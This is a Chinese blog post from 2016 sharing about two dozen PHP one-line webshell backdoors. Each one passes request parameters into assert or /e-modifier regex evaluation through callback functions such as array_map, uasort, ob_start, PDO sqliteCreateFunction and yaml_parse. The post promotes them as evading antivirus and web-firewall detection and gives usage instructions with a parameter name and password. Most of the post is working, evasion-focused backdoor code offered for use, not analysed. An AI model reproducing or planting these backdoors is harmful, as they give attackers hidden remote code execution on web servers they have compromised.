分享一些无特征PHP一句话
2016-11-20 22:47 狼人:-) 阅读(1069) 评论(0) 编辑 收藏 举报分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是:
http:// target/shell.php?e=assert 密码pass
01
$e = $_REQUEST['e'];02
$arr = array($_POST['pass'],);
array_filter($arr, $e);
$e = $_REQUEST['e'];03
$arr = array($_POST['pass'],);
array_map($e, $arr);
$e = $_REQUEST['e'];04
$arr = array('test', $_REQUEST['pass']);
uasort($arr, $e);
$e = $_REQUEST['e'];05
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
$arr = new ArrayObject(array('test', $_REQUEST['pass']));06
$arr->uasort('assert');
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));07
$arr->uksort('assert');
$e = $_REQUEST['e'];08
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
$e = $_REQUEST['e'];09
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
$e = $_REQUEST['e'];10
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');
$e = $_REQUEST['e'];11
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');12
echo preg_filter('|.*|e', $_REQUEST['pass'], '');13
ob_start('assert');14
echo $_REQUEST['pass'];
ob_end_flush();
$e = $_REQUEST['e'];15
register_shutdown_function($e, $_REQUEST['pass']);
$e = $_REQUEST['e'];16
declare(ticks=1);
register_tick_function($e, $_REQUEST['pass']);
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));17
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));18
$e = $_REQUEST['e'];19
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
$e = $_REQUEST['e'];20
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();
$str = urlencode($_REQUEST['pass']);21
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));
$mem = new Memcache();22
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);23
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);24
$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));
foreach ($iterator as $item) {echo $item;}
声明:此博有部分内容为转载,版权归原作者所有~
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南